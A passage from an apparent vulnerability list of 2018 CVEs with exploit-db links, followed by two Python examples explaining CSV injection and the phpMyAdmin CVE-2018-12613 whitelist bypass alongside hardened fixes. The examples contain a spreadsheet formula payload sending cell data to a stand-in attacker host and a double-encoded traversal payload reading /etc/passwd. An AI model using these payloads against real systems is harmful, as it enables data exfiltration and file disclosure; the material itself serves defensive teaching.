changstats.php has XSS, as demonstrated by a subject field.</td><td><a href="https://www.exploit-db.com/exploits/44795">https://www.exploit-db.com/exploits/44795</a></td></tr><tr><td>CVE-2018-11538</td><td>servlet/UserServlet in SearchBlox 8.6.6 has CSRF via the u_name, u_passwd1, u_passwd2, role, and X-XSRF-TOKEN POST parameters because of CSRF Token Bypass.</td><td><a href="https://www.exploit-db.com/exploits/44801">https://www.exploit-db.com/exploits/44801</a></td></tr><tr><td>CVE-2018-11522</td><td>Yosoro 1.0.4 has stored XSS.</td><td><a href="https://www.exploit-db.com/exploits/44803">https://www.exploit-db.com/exploits/44803</a></td></tr><tr><td>CVE-2018-10094</td><td>SQL injection vulnerability in Dolibarr before 7.0.2 allows remote attackers to execute arbitrary SQL commands via vectors involving integer parameters without quotes.</td><td><a href="https://www.exploit-db.com/exploits/44805">https://www.exploit-db.com/exploits/44805</a></td></tr><tr><td>CVE-2018-11670</td><td>An issue was discovered in GreenCMS v2.3.0603. 
There is a CSRF vulnerability that allows attackers to execute arbitrary PHP code via the content parameter to index.php?m=admin&#x26;c=media&#x26;a=fileconnect.</td><td><a href="https://www.exploit-db.com/exploits/44825">https://www.exploit-db.com/exploits/44825</a></td></tr><tr><td>CVE-2018-11628</td><td>Data input into EMS Master Calendar before 8.0.0.201805210 via URL parameters is not properly sanitized, allowing malicious attackers to send a crafted URL for XSS.</td><td><a href="https://www.exploit-db.com/exploits/44831">https://www.exploit-db.com/exploits/44831</a></td></tr><tr><td>CVE-2018-11715</td><td>The Recent Threads plugin before 1.1 for MyBB allows XSS via a thread subject.</td><td><a href="https://www.exploit-db.com/exploits/44833">https://www.exploit-db.com/exploits/44833</a></td></tr><tr><td>CVE-2018-11581</td><td>Cross-site scripting (XSS) vulnerability on Brother HL series printers allows remote attackers to inject arbitrary web script or HTML via the url parameter to etc/loginerror.html.</td><td><a href="https://www.exploit-db.com/exploits/44839">https://www.exploit-db.com/exploits/44839</a></td></tr><tr><td>CVE-2018-10969</td><td>SQL injection vulnerability in the Pie Register plugin before 3.0.10 for WordPress allows remote attackers to execute arbitrary SQL commands via the invitation codes grid.</td><td><a href="https://www.exploit-db.com/exploits/44867">https://www.exploit-db.com/exploits/44867</a></td></tr><tr><td>CVE-2018-12052</td><td>SQL Injection exists in PHP Scripts Mall Schools Alert Management Script via the q Parameter in get_sec.php.</td><td><a href="https://www.exploit-db.com/exploits/44873">https://www.exploit-db.com/exploits/44873</a></td></tr><tr><td>CVE-2018-12054</td><td>Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal.</td><td><a 
href="https://www.exploit-db.com/exploits/44874">https://www.exploit-db.com/exploits/44874</a></td></tr><tr><td>CVE-2018-12095</td><td>A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.</td><td><a href="https://www.exploit-db.com/exploits/44895">https://www.exploit-db.com/exploits/44895</a></td></tr><tr><td>CVE-2018-12094</td><td>Cross-site scripting (XSS) vulnerability in news.php in Dimofinf CMS Version 3.0.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.</td><td><a href="https://www.exploit-db.com/exploits/44897">https://www.exploit-db.com/exploits/44897</a></td></tr><tr><td>CVE-2018-12613</td><td>An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).</td><td><a href="https://www.exploit-db.com/exploits/44924">https://www.exploit-db.com/exploits/44924</a></td></tr><tr><td>CVE-2018-12613</td><td>An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. 
An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).</td><td><a href="https://www.exploit-db.com/exploits/44928">https://www.exploit-db.com/exploits/44928</a></td></tr><tr><td>CVE-2018-11525</td><td>The plugin "Advanced Order Export For WooCommerce" for WordPress (v1.5.4 and before) is vulnerable to CSV Injection.</td><td><a href="https://www.exploit-db.com/exploits/44931">https://www.exploit-db.com/exploits/44931</a></td></tr><tr><td>CVE-2018-12705</td><td>DIGISOL DG-BR4000NG devices have XSS via the SSID (it is validated only on the client side).</td><td><a href="https://www.exploit-db.com/exploits/44935">https://www.exploit-db.com/exploits/44935</a></td></tr><tr><td>CVE-2018-11526</td><td>The plugin "WordPress Comments Import &#x26; Export" for WordPress (v2.0.4 and before) is vulnerable to CSV Injection.</td><td><a href="https://www.exploit-db.com/exploits/44940">https://www.exploit-db.com/exploits/44940</a></td></tr><tr><td>CVE-2018-12636</td><td>The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page.</td><td><a href="https://www.exploit-db.com/exploits/44943">https://www.exploit-db.com/exploits/44943</a></td></tr><tr><td>CVE-2018-12912</td><td>An issue was discovered in admin\controllers\database.php in HongCMS 3.0.0. There is a SQL Injection vulnerability via an admin/index.php/database/operate?dbaction=emptytable&#x26;tablename= URI.</td><td><a href="https://www.exploit-db.com/exploits/44953">https://www.exploit-db.com/exploits/44953</a></td></tr><tr><td>CVE-2018-12519</td><td>An issue was discovered in ShopNx through 2017-11-17. 
The vulnerability allows a remote attacker to upload any malicious file to a Node.js application. An attacker can upload a malicious HTML file that contains a JavaScript payload to steal a user's credentials.</td><td><a href="https://www.exploit-db.com/exploits/44978">https://www.exploit-db.com/exploits/44978</a></td></tr><tr><td>CVE-2018-8738</td><td>Airties 5444 1.0.0.18 and 5444TT 1.0.0.18 devices allow XSS.</td><td><a href="https://www.exploit-db.com/exploits/44986">https://www.exploit-db.com/exploits/44986</a></td></tr><tr><td>CVE-2018-13849</td><td>edit_requests.php in yTakkar Instagram-clone through 2018-04-23 has XSS via an onmouseover payload because of an inadequate XSS protection mechanism based on preg_replace.</td><td><a href="https://www.exploit-db.com/exploits/45003">https://www.exploit-db.com/exploits/45003</a></td></tr><tr><td>CVE-2018-1000638</td><td>MiniCMS version 1.1 contains a Cross Site Scripting (XSS) vulnerability in http://example.org/mc-admin/page.php?date={payload} that can result in code injection.</td><td><a href="https://www.exploit-db.com/exploits/52175">https://www.exploit-db.com/exploits/52175</a></td></tr></tbody></table>
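CVE-2018-11525 and CVE-2018-11526 in the table above are both CSV injection: an export plugin writes user-entered fields (order notes, comments) straight into a CSV file, and when an administrator opens that file in a spreadsheet, a cell beginning with `=`, `+`, `-`, `@`, tab or carriage return is evaluated as a formula instead of displayed. The following is an added example, not code from either plugin, showing the vulnerable export beside a neutralized one. The sample rows and the `attacker.invalid` host are constructed for illustration; the neutralization rule (apostrophe prefix, quote every field, leave genuine numbers alone) is the usual OWASP guidance.

```python
import csv
import io
import re
from typing import Iterable, List

# Leading characters that make Excel, LibreOffice and Google Sheets evaluate a
# cell as a formula (tab and CR let a formula start after a field split).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Plain numbers such as "-12.50" or "+7" must stay numbers; only non-numeric
# text beginning with a trigger character is a candidate formula.
_NUMERIC = re.compile(r"^[+-]?(\d+([.,]\d*)?|[.,]\d+)$")


def is_formula_cell(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell instead of displaying it."""
    if not value or _NUMERIC.match(value):
        return False
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize(value: str) -> str:
    """Force a formula-looking cell to be stored as literal text.

    A leading apostrophe tells the spreadsheet the cell is text; csv.writer's
    quoting in export_csv takes care of embedded quotes and delimiters.
    """
    return "'" + value if is_formula_cell(value) else value


def export_csv(rows: Iterable[List[str]], neutralize_cells: bool = True) -> str:
    """Write rows as CSV. With neutralize_cells=False this is the vulnerable export."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize(c) if neutralize_cells else c for c in row])
    return buf.getvalue()


# Constructed sample: rows of the kind an order/comment export emits, two of
# which were entered by customers and carry spreadsheet formulas.
SAMPLE_ROWS = [
    ["order_id", "customer", "note", "total"],
    ["1001", "Alice", "leave at door", "-12.50"],
    ["1002", "Mallory", '=HYPERLINK("http://attacker.invalid/?c="&A1,"invoice")', "40.00"],
    ["1003", "Bob", "@SUM(1;2)", "+7"],
]

if __name__ == "__main__":
    print("--- vulnerable export ---")
    print(export_csv(SAMPLE_ROWS, neutralize_cells=False))
    print("--- neutralized export ---")
    print(export_csv(SAMPLE_ROWS))
```

The numeric exemption matters in practice: a blanket rule that prefixes every cell starting with `-` turns every negative total into text and breaks the spreadsheet's arithmetic, which is why real exports often skip neutralization entirely. The regex keeps numbers as numbers and still catches `-2+3+cmd|...`-style payloads, because those are not purely numeric.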

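The two CVE-2018-12613 rows above describe the mechanism only as "an improper test for whitelisted pages" in the code that redirects and loads pages. The bug class is a check/use mismatch: the page name is URL-decoded before it is compared against the whitelist, but the raw, undecoded value is what gets included, so a `?` that is still percent-encoded at include time splits the string in the check yet is an ordinary path character in the include. The following is an added example modelling that mismatch in Python; it is not phpMyAdmin's code, and the whitelist, the `PAYLOAD` string and the `simulate_request` helper are constructed for the model.

```python
import posixpath
from typing import Callable, Optional
from urllib.parse import unquote

# Constructed stand-in for the application's list of pages index.php may load.
PAGE_WHITELIST = {"db_sql.php", "server_sql.php", "tbl_sql.php"}


def _strip_query(page: str) -> str:
    """Keep only the part before the first '?', as a page name."""
    return page.split("?", 1)[0]


def flawed_check(page: str) -> bool:
    """Whitelist test that decodes the value once more than the include does.

    The raw value is tested first; if that fails it is URL-decoded and tested
    again. Passing in decoded form does not change what is later included.
    """
    if _strip_query(page) in PAGE_WHITELIST:
        return True
    return _strip_query(unquote(page)) in PAGE_WHITELIST


def strict_check(page: str) -> bool:
    """Validate exactly the string the include will use: no decoding, and the
    normalised path must be the whitelisted name itself (no traversal)."""
    candidate = _strip_query(page)
    return candidate in PAGE_WHITELIST and posixpath.normpath(candidate) == candidate


def resolved_include_path(page: str) -> str:
    """Path a file include opens: the raw value with '.' and '..' resolved.
    A bogus leading segment such as 'db_sql.php%3f' is cancelled by the '..'
    that follows it."""
    return posixpath.normpath(page)


def simulate_request(target: str, check: Callable[[str], bool]) -> Optional[str]:
    """Return the file that would be included, or None if the check refuses it."""
    return resolved_include_path(target) if check(target) else None


# Constructed payload. On the wire the parameter would be sent double-encoded,
#   target=db_sql.php%253f/../../../etc/passwd
# so that after the web server decodes it once the application sees '%3f',
# not '?': the raw value has no '?' at all, only the decoded copy does.
PAYLOAD = "db_sql.php%3f/../../../etc/passwd"
LEGIT = "db_sql.php"

if __name__ == "__main__":
    for name, check in (("flawed", flawed_check), ("strict", strict_check)):
        print(f"{name:7} {LEGIT!r:38} -> {simulate_request(LEGIT, check)!r}")
        print(f"{name:7} {PAYLOAD!r:38} -> {simulate_request(PAYLOAD, check)!r}")
```

The hardened check does two things the flawed one does not: it never decodes (the value compared is byte-for-byte the value used), and it requires the normalised path to equal the whitelist entry, so `..` segments can never survive the check. That second property is what makes the fix robust to other encodings of the separator, not just `%3f`.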